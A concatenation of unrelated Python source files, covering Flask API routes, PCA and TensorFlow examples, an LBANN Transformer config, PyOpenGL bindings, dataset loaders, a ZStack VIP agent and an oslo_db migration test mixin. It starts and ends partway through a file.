'si_bol': md['innings']['innings2']['bowling_team'],
'active': md['active']
}
return match_details
# API to update Match Details
@app.route('/test/matchDetails', methods = ['POST'])
def updateMatchDetails():
input_data = request.json
update_result = update_match_details(input_data)
return jsonify(update_result)
#API to update match final over stats
@app.route('/test/matchFinalOverDetails', methods = ['POST'])
def updateMatchFinalOverDetails():
input_data = request.json
update_result = update_final_over_details(input_data)
return jsonify(update_result)
# API to update the predicted result of match
@app.route('/test/updatePredictedResult/<match_id>', methods = ['POST'])
def updatePredictedResult(match_id):
update_predicted_result(match_id)
return "Update done"
if __name__ == '__main__':
# This is used when running locally only. When deploying to Google App
# Engine, a webserver process such as Gunicorn will serve the app. This
# can be configured by adding an `entrypoint` to app.yaml.
# Flask's development server will automatically serve static files in
# the "static" directory. See:
# http://flask.pocoo.org/docs/1.0/quickstart/#static-files. Once deployed,
# App Engine itself will serve those files as configured in app.yaml.
app.run(host='localhost', port=8080, debug=True)
|
"""
Created on 31 Jan 2021
Example to show myself that PCA when you don't drop any
dimensions gives you back the same data with the transform,
and show the amount of variance lost with different num
of principal components
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import datasets
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
# load the data
cancer_data = datasets.load_breast_cancer()
cancer = cancer_data['data']
print(f"Shape of data is: {cancer.shape}")
cancer_df = pd.DataFrame(cancer,
columns=cancer_data['feature_names'])
cancer_df.head(3)
# carry out feature scaling
# variables are not similar scales
scaler = StandardScaler()
# fit the scaler
scaler.fit(cancer_df)
# normalise the data - 0 mean, standard deviation 1
cancer_scaled = scaler.transform(cancer)
# use describe to confirm the mean and st dev
pd.DataFrame(cancer_scaled,
columns=cancer_data['feature_names']).describe()
print(f'Cancer dataset has {len(cancer_data.feature_names)} different features')
# try a few different iterations of PCA using different number of
# components
num_pc_iter = [5, 10, 15, 20, 25, 30]
for i, num_pc in enumerate(num_pc_iter, 1): # get enumerate to start at one
# use PCA on the transformed dataset to reduce dimensions
print("*"*30)
print(f"Iteration {i}. \n "
f"Number of principal components to choose: {num_pc}")
pca = PCA(n_components=num_pc)
pca.fit(cancer_scaled)
# transform the data using the num of principal components
transformed_data = pca.transform(cancer_scaled)
transformed_variance = pca.explained_variance_ratio_
# print(f"The original shape of data was {cancer.shape}. \n"
# f"The shape of the new mapped data is {transformed_data.shape} \n")
print(f"Explained {100 * np.cumsum(transformed_variance)[-1]: .2f}% of total variance ")
# map the data back to original space following compression
cancer_re_mapped = pca.inverse_transform(transformed_data)
diff_new_old = cancer_re_mapped - cancer_scaled
print(f"Max sum of differences for features (between newly mapped and original)"
f" {np.max(np.sum(diff_new_old, axis=0)) :.2E} \n")
|
# Author: Andreas Putz
# Copyright (c) 2013, PyhtonFCST
# License: TBD.
r"""
:mod:`PythonFCST`: Python helpers for OpenFCST
===============================================================================
Documentation is available in the docstrings and in ths sphinx documentation.
Contents
--------
The PythonFCST package imports all the functions from the top level modules.
Subpackages
-----------
.. list-table:: `PythonFCST` module structure.
:widths: 10 80 10
:header-rows: 1
* - name
- description
- autoload
* - :mod:`PythonFCST.util`
- common utilities and classes used by most of the othe rmodules
- yes
* - :mod:`PythonFCST.mesh`
- Mesh generation classes
- yes
* - `VISU`
- Visualisation methods
- yes
* - `interactive/`
- setup of IPython-based shell `isfepy`
-
Prefix convention
-----------------
::
None as yet
Utility tools
-------------
::
TODO --- Todo
Import
------
>>> import PythonFCST as fcst
Inheritance diagram
-------------------
.. inheritance-diagram:: PythonFCST
Package Documentation
---------------------
.. automodule:: util
:members:
:undoc-members:
:show-inheritance:
.. automodule:: mesh
:members:
:undoc-members:
:show-inheritance:
"""
__version__ = '0.0.1'
__requires__ = [
'scipy',
'numpy',
]
#__extras_require__ = {PyFCell
# 'app': [
# 'envisage',
# ],
#}
# __all__ = ['misc']
import util
import mesh
import pylab as pl
def pylab_setup():
fig_width_pt = 246.0 # Get this from LaTeX using \showthe\columnwidth
inches_per_pt = 1.0/72.27 # Convert pt to inch
fig_width_cm = 30.0
inches_per_cm = 0.393
golden_mean = (pl.sqrt(5)-1.0)/2.0 # Aesthetic ratio
fig_width = fig_width_cm*inches_per_cm # width in inches
fig_height = fig_width*golden_mean # height in inches
fig_size = [fig_width,fig_height]
params = {
'backend': 'ps',
# 'backend': 'svg',
'axes.labelsize': 24,
'axes.titlesize': 28,
# 'text.fontsize': 20,
'legend.fontsize': 20,
# 'ticks.font':'Helvetica',
'xtick.labelsize': 20,
'ytick.labelsize': 20,
'text.usetex': True,
'text.latex.preamble': [
r'\usepackage{siunitx}', # i need upright \micro symbols, but you need...
#r'\sisetup{detect-all}', # ...this to force siunitx to actually use your fonts
r'\usepackage{helvet}', # set the normal font here
r'\usepackage{sansmath}', # load up the sansmath so that math -> helvet
r'\sansmath'], # <- tricky! -- gotta actually tell tex to use!,
'figure.figsize': fig_size,
'font.family':'sans-serif',
'font.serif':'Computer Modern Roman',
'font.sans-serif':'Helvetica'
}
for key in params.keys():
if pl.rcParams.has_key(key):
pl.rcParams[key] = params[key]
else:
print "Your version of matplotlib does not support the parameter ", key
pylab_setup() |
print ('Hola Mundo, soy del TERCERO C')
|
"""Configure LBANN experiment with Transformer model."""
import math
import os.path
import lbann
import lbann.models
import lbann.contrib.launcher
from lbann.util import str_list
import dataset
# ----------------------------------------------
# Options
# ----------------------------------------------
# Dataset properties
vocab_size = dataset.vocab_size()
sequence_length = dataset.sequence_length
pad_index = dataset.pad_index
# ----------------------------------------------
# Model
# ----------------------------------------------
def make_model(
mini_batch_size,
num_epochs,
embed_dim,
num_heads,
label_smoothing,
):
# Embedding weights
var = 2 / (embed_dim + vocab_size) # Glorot initialization
embedding_weights = lbann.Weights(
name='embeddings',
initializer=lbann.NormalInitializer(standard_deviation=math.sqrt(var)),
)
# Input is two sequences of token IDs
input_ = lbann.Identity(lbann.Input())
# Get sequences of embedding vectors
# Note: Scale embeddings by sqrt(embed_dim).
# Note: Decoder input is shifted right, so embedding for last
# token isn't needed.
embeddings_tokens = lbann.Identity(lbann.Slice(
input_,
axis=0,
slice_points=str_list([0, 2*sequence_length-1]),
))
embeddings = lbann.Embedding(
embeddings_tokens,
weights=embedding_weights,
num_embeddings=vocab_size,
embedding_dim=embed_dim,
padding_idx=pad_index,
)
embeddings = lbann.WeightedSum(
embeddings,
scaling_factors=str(math.sqrt(embed_dim)),
)
embeddings_slice = lbann.Slice(
embeddings,
axis=0,
slice_points=str_list([0, sequence_length, 2*sequence_length-1]),
)
encoder_input = lbann.Identity(embeddings_slice)
decoder_input = lbann.Identity(embeddings_slice)
# Apply transformer model
transformer = lbann.models.Transformer(
hidden_size=embed_dim,
num_heads=num_heads,
name='transformer',
)
result = transformer(
encoder_input, sequence_length,
decoder_input, sequence_length-1,
)
# Reconstruct decoder input
preds = lbann.ChannelwiseFullyConnected(
result,
weights=embedding_weights,
output_channel_dims=[vocab_size],
bias=False,
transpose=True,
)
preds = lbann.ChannelwiseSoftmax(preds)
preds = lbann.Slice(preds, axis=0, slice_points=str_list(range(sequence_length)))
preds = [lbann.Identity(preds) for _ in range(sequence_length-1)]
# Count number of non-pad tokens
label_tokens = lbann.Identity(lbann.Slice(
input_,
slice_points=str_list([sequence_length+1, 2*sequence_length]),
))
pads = lbann.Constant(value=pad_index, num_neurons=str(sequence_length-1))
is_not_pad = lbann.NotEqual(label_tokens, pads)
num_not_pad = lbann.Reduction(is_not_pad, mode='sum')
# Cross entropy loss with label smoothing
label_tokens = lbann.Slice(
label_tokens,
slice_points=str_list(range(sequence_length)),
)
label_tokens = [lbann.Identity(label_tokens) for _ in range(sequence_length-1)]
if label_smoothing > 0:
uniform_label = lbann.Constant(
value=1/vocab_size,
num_neurons=str_list([1, vocab_size])
)
loss = []
for i in range(sequence_length-1):
label = lbann.OneHot(label_tokens[i], size=vocab_size)
label = lbann.Reshape(label, dims=str_list([1, vocab_size]))
if label_smoothing > 0:
label = lbann.WeightedSum(
label,
uniform_label,
scaling_factors=str_list([1-label_smoothing, label_smoothing]),
)
loss.append(lbann.CrossEntropy(preds[i], label))
loss = lbann.Concatenation(loss)
# Average cross entropy over non-pad tokens
loss_scales = lbann.Divide(
is_not_pad,
lbann.Tessellate(num_not_pad, hint_layer=is_not_pad),
)
loss = lbann.Multiply(loss, loss_scales)
loss = lbann.Reduction(loss, mode='sum')
# Construct model
metrics = []
callbacks = [lbann.CallbackPrint(), lbann.CallbackTimer()]
return lbann.Model(
mini_batch_size,
num_epochs,
layers=lbann.traverse_layer_graph(input_),
objective_function=loss,
metrics=metrics,
callbacks=callbacks,
)
# ----------------------------------------------
# Data reader
# ----------------------------------------------
def make_data_reader():
reader = lbann.reader_pb2.DataReader()
_reader = reader.reader.add()
_reader.name = 'python'
_reader.role = 'train'
_reader.shuffle = True
_reader.percent_of_data_to_use = 1.0
_reader.python.module = 'dataset'
_reader.python.module_dir = os.path.dirname(os.path.realpath(__file__))
_reader.python.sample_function = 'get_train_sample'
_reader.python.num_samples_function = 'num_train_samples'
_reader.python.sample_dims_function = 'sample_dims'
return reader
# ----------------------------------------------
# Batch script
# ----------------------------------------------
def make_batch_script(model_params, script_params):
# Create LBANN objects
trainer = lbann.Trainer()
model = make_model(**model_params)
reader = make_data_reader()
# Optimizer with learning rate schedule
# Note: Rough approximation of
# embed_dim^-0.5 * min(step^-0.5, step*warmup^-1.5)
# with embed_dim=512 and warmup=4000.
opt = lbann.Adam(learn_rate=0.0001, beta1=0.9, beta2=0.98, eps=1e-9)
model.callbacks.append(
lbann.CallbackDropFixedLearningRate(
drop_epoch=[1],
amt=2,
)
)
model.callbacks.append(
lbann.CallbackDropFixedLearningRate(
drop_epoch=[2,4,8,12],
amt=0.75,
)
)
# Checkpoint after every epoch
trainer.callbacks.append(
lbann.CallbackCheckpoint(
checkpoint_dir=os.path.join(script_params['work_dir'], 'checkpoint'),
checkpoint_epochs=1,
)
)
# Dump weights after every epoch
model.callbacks.append(
lbann.CallbackDumpWeights(
basename=os.path.join(script_params['work_dir'], 'weights'),
epoch_interval=1,
)
)
# Create Protobuf file
protobuf_file = os.path.join(script_params['work_dir'], 'experiment.prototext')
lbann.proto.save_prototext(
protobuf_file,
trainer=trainer,
model=model,
data_reader=reader,
optimizer=opt,
)
# Create batch script
script = lbann.contrib.launcher.make_batch_script(
**script_params,
)
script.add_command('echo "Started training at $(date)"')
script.add_parallel_command([
lbann.lbann_exe(),
f'--prototext={protobuf_file}',
])
script.add_command('status=$?')
script.add_command('echo "Finished training at $(date)"')
script.add_command('exit ${status}')
return script
|
from argparse import ArgumentParser # use traditional argparse instead hiargparse
from hiargparse import ArgsProvider, Arg, ChildProvider # need to define child arguments
from hiargparse import Namespace # wrapper for argparse.Namespace
# just same as example.py
from example import Son
if __name__ == '__main__':
# set a root argument provider (same as other argument providers)
args_provider = ArgsProvider(
args=[Arg(name='foo', default='bar')],
child_providers=[ChildProvider(Son)]
)
# quite usual argparse way
parser = ArgumentParser()
parser.add_argument('-V', '--version', action='version', version='v1.0')
# here we have to write some weird code
# invoke args_provider's method with the parser
# instead of parser's method with the args_provider
args_provider.add_arguments_to_parser(parser)
# parse_args with original parser
# in a tipical case, this line hides behind other libraries' implementation
params = parser.parse_args()
# convert argparse.Namespace to hiargparse.Namespace
params = Namespace(params)
# do some deferred actions relating to arg propagation
args_provider.apply_propagations(params)
# now you have ALL parameters including child and grandchild arguments
# please try to execute with --help
print(params.foo)
son = Son(params.Son)
son.print_()
|
from __future__ import annotations
import collections
import inspect
import pathlib
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Tuple
from typing import TypeVar
from typing import cast
from multipledispatch.dispatcher import Dispatcher
from multipledispatch.dispatcher import str_signature
F = TypeVar('F', bound=Callable[[], Any])
_commands: Dict[str, Command] = {}
def command(
name: str = None,
schema: dict = None,
) -> Callable[[F], Command]:
"""Define a new command."""
def _(func: F) -> Command:
_name = func.__name__ if name is None else name
if _name in _commands:
raise Exception(f"{_name!r} is already defined.")
_commands[_name] = Command(_name)
_commands[_name].schema = schema or {}
return _commands[_name]
return cast(Command, _)
class Command(Dispatcher):
schema: dict
def register(
self,
*signature_types,
schema=None,
) -> Callable[[F], Command]:
def _(func: F) -> Command:
types = signature_types or tuple(_find_func_types(func))
self.add(types, func)
return self
return cast(Command, _)
def __getitem__(self, types):
types = types if isinstance(types, tuple) else (types,)
func = self.dispatch(*types)
if not func:
raise NotImplementedError(
f"Could not find signature for {self.name}: "
f"<{str_signature(types)}>"
)
return func
def print_methods(self, *args, **kwargs) -> None:
"""Print all commands method in resolution order."""
if args:
# Find method by given args.
args = tuple([type(arg) for arg in args])
func = self.dispatch(*args)
else:
func = None
base = pathlib.Path().resolve()
arg_names = _extend_duplicate_names(self.ordering)
print('---')
for args in self.ordering:
func_ = self.funcs[args]
mark = func_ is func
_print_method(base, func_, self.name, arg_names, args, mark)
def _extend_duplicate_names(
argslist: List[Tuple[type]]
) -> Dict[type, str]:
argnames = collections.defaultdict(set)
for args in argslist:
for arg in args:
name = arg.__name__
argnames[name].add(arg)
for i in range(10):
found = False
for name in list(argnames):
if len(argnames[name]) == 1:
continue
found = True
n = name.count('.') + 1
args = argnames.pop(name)
for arg in args:
name = arg.__module__.split('.')[-n:] + [arg.__name__]
name = '.'.join(name)
argnames[name].add(arg)
if not found:
break
return {next(iter(v)): k for k, v in argnames.items()}
def _print_method(base, func, name, argnames, args, mark=False):
file = inspect.getsourcefile(func)
line = inspect.getsourcelines(func)[1]
try:
file = pathlib.Path(file).relative_to(base)
except ValueError:
# If two paths do not have common base, then fallback to full
# file path.
pass
argsn = ', '.join([argnames[arg] for arg in args])
signature = f'{name}({argsn}):'
marker = ' * ' if mark else ' '
print(f'{marker}{signature:<60} {file}:{line}')
def _find_func_types(func):
sig = inspect.signature(func)
kinds = {
inspect.Parameter.POSITIONAL_ONLY,
inspect.Parameter.POSITIONAL_OR_KEYWORD,
}
for param in sig.parameters.values():
if param.kind not in kinds or param.annotation is param.empty:
break
yield param.annotation
|
'''
@author: frank
'''
from virtualrouter import virtualrouter
from zstacklib.utils import http
from zstacklib.utils import jsonobject
from zstacklib.utils import linux
from zstacklib.utils import log
from zstacklib.utils import lock
logger = log.get_logger(__name__)
class VipTO(object):
def __init__(self):
self.ip = None
self.netmask = None
self.gateway = None
self.ownerEthernetMac= None
class CreateVipCmd(virtualrouter.AgentCommand):
def __init__(self):
super(CreateVipCmd, self).__init__()
self.vips = None
class CreateVipRsp(virtualrouter.AgentResponse):
def __init__(self):
super(CreateVipRsp, self).__init__()
class RemoveVipCmd(virtualrouter.AgentCommand):
def __init__(self):
super(RemoveVipCmd, self).__init__()
self.vips = None
class RemoveVipRsp(virtualrouter.AgentResponse):
def __init__(self):
super(RemoveVipRsp, self).__init__()
class Vip(virtualrouter.VRAgent):
VR_CREATE_VIP = "/createvip"
VR_REMOVE_VIP = "/removevip"
@virtualrouter.replyerror
@lock.lock('vip')
def remove_vip(self, req):
cmd = jsonobject.loads(req[http.REQUEST_BODY])
for vip in cmd.vips:
linux.delete_vip_by_ip_if_exists(vip.ip)
logger.debug('removed vip %s' % jsonobject.dumps(vip))
rsp = RemoveVipRsp()
return jsonobject.dumps(rsp)
@virtualrouter.replyerror
@lock.lock('vip')
def create_vip(self, req):
cmd = jsonobject.loads(req[http.REQUEST_BODY])
for vip in cmd.vips:
linux.create_vip_if_not_exists(vip.ownerEthernetMac, vip.ip, vip.netmask)
logger.debug('created vip %s' % jsonobject.dumps(vip))
rsp = CreateVipRsp()
return jsonobject.dumps(rsp)
def start(self):
virtualrouter.VirtualRouter.http_server.register_async_uri(self.VR_CREATE_VIP, self.create_vip)
virtualrouter.VirtualRouter.http_server.register_async_uri(self.VR_REMOVE_VIP, self.remove_vip)
def stop(self):
pass
|
import pytest
import numpy as np
from solarforecastarbiter.metrics import summary
@pytest.mark.parametrize("ts", [
[1, 2, 3],
np.random.rand(10),
np.random.rand(1000),
])
def test_scalar(ts):
for metric in summary._MAP:
f = summary._MAP[metric][0]
assert np.isscalar(f(ts))
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_APPLE_vertex_array_range'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_APPLE_vertex_array_range',error_checker=_errors._error_checker)
GL_STORAGE_CACHED_APPLE=_C('GL_STORAGE_CACHED_APPLE',0x85BE)
GL_STORAGE_CLIENT_APPLE=_C('GL_STORAGE_CLIENT_APPLE',0x85B4)
GL_STORAGE_SHARED_APPLE=_C('GL_STORAGE_SHARED_APPLE',0x85BF)
GL_VERTEX_ARRAY_RANGE_APPLE=_C('GL_VERTEX_ARRAY_RANGE_APPLE',0x851D)
GL_VERTEX_ARRAY_RANGE_LENGTH_APPLE=_C('GL_VERTEX_ARRAY_RANGE_LENGTH_APPLE',0x851E)
GL_VERTEX_ARRAY_RANGE_POINTER_APPLE=_C('GL_VERTEX_ARRAY_RANGE_POINTER_APPLE',0x8521)
GL_VERTEX_ARRAY_STORAGE_HINT_APPLE=_C('GL_VERTEX_ARRAY_STORAGE_HINT_APPLE',0x851F)
@_f
@_p.types(None,_cs.GLsizei,ctypes.c_void_p)
def glFlushVertexArrayRangeAPPLE(length,pointer):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
def glVertexArrayParameteriAPPLE(pname,param):pass
@_f
@_p.types(None,_cs.GLsizei,ctypes.c_void_p)
def glVertexArrayRangeAPPLE(length,pointer):pass
|
import torch
import torchvision.transforms as transforms
import torch.utils.data as data
import torch.nn.functional as F
import functools
from PIL import Image
import os
import os.path
import numpy as np
from numpy import linalg as LA
import csv
import pandas as pd
import pickle
def make_dataset(dir):
val_csv_file = '/scratch/ainaz/OASIS/OASIS_trainval/OASIS_val.csv'
d = pd.read_csv(val_csv_file)
imgs = d['Image'].tolist()
normals = d['Normal'].tolist()
masks = d['Mask'].tolist()
paths = []
for i in range(len(imgs)):
img_path = os.path.join('/scratch/ainaz', imgs[i])
normal_path = os.path.join('/scratch/ainaz', normals[i])
mask_path = os.path.join('/scratch/ainaz', masks[i])
paths.append([img_path, normal_path, mask_path])
return paths
def rgb_normal_mask_loader(path):
rgb_path, normal_path, mask_path = path
rgb = np.array(Image.open(rgb_path))
with open(normal_path, 'rb') as f:
normal = pickle.load(f)
mask = np.array(Image.open(mask_path))
return rgb, normal, mask
to_tensor = transforms.ToTensor()
RGB_MEAN = torch.Tensor([0.55312, 0.52514, 0.49313]).reshape(3,1,1)
RGB_STD = torch.Tensor([0.20555, 0.21775, 0.24044]).reshape(3,1,1)
class OASISDataset(data.Dataset):
def __init__(self, root, output_size, normalized=False):
imgs = make_dataset(root)
print(len([im for im in imgs if im[1] == 1]))
assert len(imgs) > 0, "Found 0 images in subfolders of: " + root + "\n"
print("Found {} images in {} folder.".format(len(imgs), type))
self.root = root
self.imgs = imgs
self.output_size = output_size
self.transform_rgb = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize(self.output_size, Image.BILINEAR),
transforms.ToTensor()])
if normalized:
self.transform_rgb = transforms.Compose(
self.transform_rgb.transforms + [transforms.Normalize(mean=RGB_MEAN, std=RGB_STD)]
)
self.transform_normal = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize(self.output_size, Image.NEAREST),
transforms.ToTensor()])
def __getitem__(self, index):
path = self.imgs[index]
rgb, gt, mask = rgb_normal_mask_loader(path)
if len(rgb.shape) < 3:
print("://")
rgb = np.expand_dims(rgb, axis=2)
rgb = np.repeat(rgb, 3, axis=2)
gt_normal = gt['normal']
gt_normal[:,:,2] *= -1
gt_normal = np.uint8((gt_normal + 1) * 0.5 * 255.0)
normal = np.zeros_like(rgb)
normal[gt['min_y']:gt['max_y']+1, gt['min_x']:gt['max_x']+1] = gt_normal
center_x = (gt['min_x'] + gt['max_x']) // 2
center_y = (gt['min_y'] + gt['max_y']) // 2
h, w = rgb.shape[0], rgb.shape[1]
if h < w:
if center_x > w // 2:
cropped_rgb = rgb[0:h, w-h:w]
cropped_mask = mask[0:h, w-h:w]
cropped_normal = normal[0:h, w-h:w]
else:
cropped_rgb = rgb[0:h, 0:h]
cropped_mask = mask[0:h, 0:h]
cropped_normal = normal[0:h, 0:h]
else:
if center_y > h // 2:
cropped_rgb = rgb[h-w:h, 0:w]
cropped_mask = mask[h-w:h, 0:w]
cropped_normal = normal[h-w:h, 0:w]
else:
cropped_rgb = rgb[0:w, 0:w]
cropped_mask = mask[0:w, 0:w]
cropped_normal = normal[0:w, 0:w]
return self.transform_rgb(cropped_rgb), self.transform_normal(cropped_normal), self.transform_normal(cropped_mask)
def __len__(self):
return len(self.imgs)
|
from markovdp.q_state import QState
class QStateDT(QState):
"""Class to represent a q-state in a Decision Tree MDP model."""
def remove_state(self, state_num):
"""Removes the transition and reward information for that Q-state.
Args:
state_num (int): The unique state number in the MDP model
"""
self._action_taken_times -= self._transitions[state_num]
self._transitions[state_num] = 0
self._rewards[state_num] = 0
def extend_states(self, num_states):
"""Adds extra states to the reward and transition info.
Args:
num_states (int): The number of the extra states to add.
"""
self._total_states += num_states
self._transitions += [0] * num_states
self._rewards += [0] * num_states
|
'''
A Multilayer Perceptron implementation example using TensorFlow library.
This example is using the MNIST database of handwritten digits (http://yann.lecun.com/exdb/mnist/)
Author: Aymeric Damien
Project: https://github.com/aymericdamien/TensorFlow-Examples/
'''
# Import MINST data
import input_data
mnist = input_data.read_data_sets("/home/ubuntu/workspace/tmp5/data/", one_hot=True)
import tensorflow as tf
# Parameters
learning_rate = 0.001
training_epochs = 15
batch_size = 100
display_step = 1
# Network Parameters
n_hidden_1 = 256 # 1st layer num features
n_hidden_2 = 256 # 2nd layer num features
n_input = 784 # MNIST data input (img shape: 28*28)
n_classes = 10 # MNIST total classes (0-9 digits)
# tf Graph input
x = tf.placeholder("float", [None, n_input])
y = tf.placeholder("float", [None, n_classes])
# Create model
def multilayer_perceptron(_X, _weights, _biases):
layer_1 = tf.nn.relu(tf.add(tf.matmul(_X, _weights['h1']), _biases['b1'])) #Hidden layer with RELU activation
layer_2 = tf.nn.relu(tf.add(tf.matmul(layer_1, _weights['h2']), _biases['b2'])) #Hidden layer with RELU activation
return tf.matmul(layer_2, _weights['out']) + _biases['out']
# Store layers weight & bias
weights = {
'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),
'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))
}
biases = {
'b1': tf.Variable(tf.random_normal([n_hidden_1])),
'b2': tf.Variable(tf.random_normal([n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_classes]))
}
# Construct model
pred = multilayer_perceptron(x, weights, biases)
# Define loss and optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y)) # Softmax loss
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost) # Adam Optimizer
# Initializing the variables
init = tf.initialize_all_variables()
# Launch the graph
with tf.Session() as sess:
sess.run(init)
# Training cycle
for epoch in range(training_epochs):
avg_cost = 0.
total_batch = int(mnist.train.num_examples/batch_size)
# Loop over all batches
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
# Fit training using batch data
sess.run(optimizer, feed_dict={x: batch_xs, y: batch_ys})
# Compute average loss
avg_cost += sess.run(cost, feed_dict={x: batch_xs, y: batch_ys})/total_batch
# Display logs per epoch step
if epoch % display_step == 0:
print "Epoch:", '%04d' % (epoch+1), "cost=", "{:.9f}".format(avg_cost)
print "Optimization Finished!"
# Test model
correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
# Calculate accuracy
accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
print "Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels})
|
from thumt.optimizers.optimizers import exclude_variables
from thumt.optimizers.optimizers import AdamOptimizer
from thumt.optimizers.optimizers import AdadeltaOptimizer
from thumt.optimizers.optimizers import SGDOptimizer
from thumt.optimizers.optimizers import MultiStepOptimizer
from thumt.optimizers.optimizers import LossScalingOptimizer
from thumt.optimizers.schedules import LinearWarmupRsqrtDecay
from thumt.optimizers.schedules import PiecewiseConstantDecay
from thumt.optimizers.schedules import LinearExponentialDecay
from thumt.optimizers.clipping import (
adaptive_clipper, global_norm_clipper, value_clipper)
|
import datetime
import pandas as pd
import numpy as np
from dask import dataframe as dd
import matplotlib.pyplot as plt
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
#load in the dask dataframe
df = dd.read_parquet("/Users/amyferrick/Downloads/5_min_gps_subset/unr_5min_gps" + ".parquet")
def query_data(df, site_ID, start_time, end_time):
# returns the position component arrays for a specific site and time interval
# start time and end time must be date time objects
one_site = df.query('site == ' + site_ID)
in_interval = one_site.query(start_time + ' <= date_time < ' + end_time)
time = in_interval.date_time.compute().values
e = in_interval.e_ref.compute().values
n = in_interval.n_ref.compute().values
v = in_interval.v_ref.compute().values
return time, e, n, v
site_ID = '"LHAW"' # fill in site ID here (the double quotation is necessary)
siteID = 'LHAW' # with single quotes, need this for plotting later
start_time = 'datetime.datetime(2013, 2, 28, 12)'# fill in start of time interval
end_time = 'datetime.datetime(2013, 3, 3, 12)' # fill in end of time interval
time, e, n, v = query_data(df, site_ID, start_time, end_time)
# plot the three panel time series
plt.figure(figsize=(20,10))
plt.suptitle("Site: "+site_ID, weight='bold')
plt.subplot(3, 1, 1)
plt.plot(time, e, "r.", ms=1)
plt.xlabel("time", weight='bold')
plt.ylabel("east position (units)", weight = 'bold')
plt.subplot(3, 1, 2)
plt.plot(time, n, "r.", ms=1)
plt.xlabel("time", weight='bold')
plt.ylabel("north position (units)", weight='bold')
plt.subplot(3, 1, 3)
plt.plot(time, v, "r.", ms=1)
plt.xlabel("time", weight='bold')
plt.ylabel("up position (units)", weight='bold')
plt.savefig("/Users/amyferrick/Downloads/5_min_gps_subset/" + siteID + ".png")
plt.show()
|
from sqlalchemy import *
from databases import Database
import aiomysql
import sqlalchemy
from sqlalchemy.engine import reflection
import pytest
import functools
import asyncio
from devtools import debug
from unimeta.table import Table
from loguru import logger
import configparser
from unimeta.libs.liburl import parse_url
import pymysql
import time
import random
config = configparser.ConfigParser()
config.read(".env")
async def fake() -> None:
database_url = config['mysql'].get("url")
meta = Table.metadata(database_url)
debug(meta)
hint = {
"email":"ascii_free_email",
"phone_number":"phone_number",
"first_name":"first_name",
"last_name":"last_name"
}
async with Database(database_url) as database:
while True:
try:
keys = list(meta.keys())
key = random.choice(keys)
debug(key)
table = meta[key]
primary_id = await table.mock_insert(database, hint)
await table.mock_update(database, hint, primary_id)
except pymysql.err.DataError:
logger.exception("what")
if __name__ == "__main__":
loop = asyncio.get_event_loop()
res = loop.run_until_complete(fake())
loop.close() |
# Copyright 2010-2011 OpenStack Foundation
# Copyright 2012-2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import collections
import functools
import logging
import pprint
import alembic
import alembic.autogenerate
import alembic.migration
import pkg_resources as pkg
import six
import sqlalchemy
import sqlalchemy.exc
import sqlalchemy.sql.expression as expr
import sqlalchemy.types as types
from oslo_db._i18n import _LE
from oslo_db import exception as exc
from oslo_db.sqlalchemy import utils
LOG = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class WalkVersionsMixin(object):
"""Test mixin to check upgrade and downgrade ability of migration.
This is only suitable for testing of migrate_ migration scripts. An
abstract class mixin. `INIT_VERSION`, `REPOSITORY` and `migration_api`
attributes must be implemented in subclasses.
.. _auxiliary-dynamic-methods: Auxiliary Methods
Auxiliary Methods:
`migrate_up` and `migrate_down` instance methods of the class can be
used with auxiliary methods named `_pre_upgrade_<revision_id>`,
`_check_<revision_id>`, `_post_downgrade_<revision_id>`. The methods
intended to check applied changes for correctness of data operations.
This methods should be implemented for every particular revision
which you want to check with data. Implementation recommendations for
`_pre_upgrade_<revision_id>`, `_check_<revision_id>`,
`_post_downgrade_<revision_id>` implementation:
* `_pre_upgrade_<revision_id>`: provide a data appropriate to
a next revision. Should be used an id of revision which
going to be applied.
* `_check_<revision_id>`: Insert, select, delete operations
with newly applied changes. The data provided by
`_pre_upgrade_<revision_id>` will be used.
* `_post_downgrade_<revision_id>`: check for absence
(inability to use) changes provided by reverted revision.
Execution order of auxiliary methods when revision is upgrading:
`_pre_upgrade_###` => `upgrade` => `_check_###`
Execution order of auxiliary methods when revision is downgrading:
`downgrade` => `_post_downgrade_###`
.. _migrate: https://sqlalchemy-migrate.readthedocs.org/en/latest/
"""
@abc.abstractproperty
def INIT_VERSION(self):
"""Initial version of a migration repository.
Can be different from 0, if a migrations were squashed.
:rtype: int
"""
pass
@abc.abstractproperty
def REPOSITORY(self):
"""Allows basic manipulation with migration repository.
:returns: `migrate.versioning.repository.Repository` subclass.
"""
pass
@abc.abstractproperty
def migration_api(self):
"""Provides API for upgrading, downgrading and version manipulations.
:returns: `migrate.api` or overloaded analog.
"""
pass
@abc.abstractproperty
def migrate_engine(self):
"""Provides engine instance.
Should be the same instance as used when migrations are applied. In
most cases, the `engine` attribute provided by the test class in a
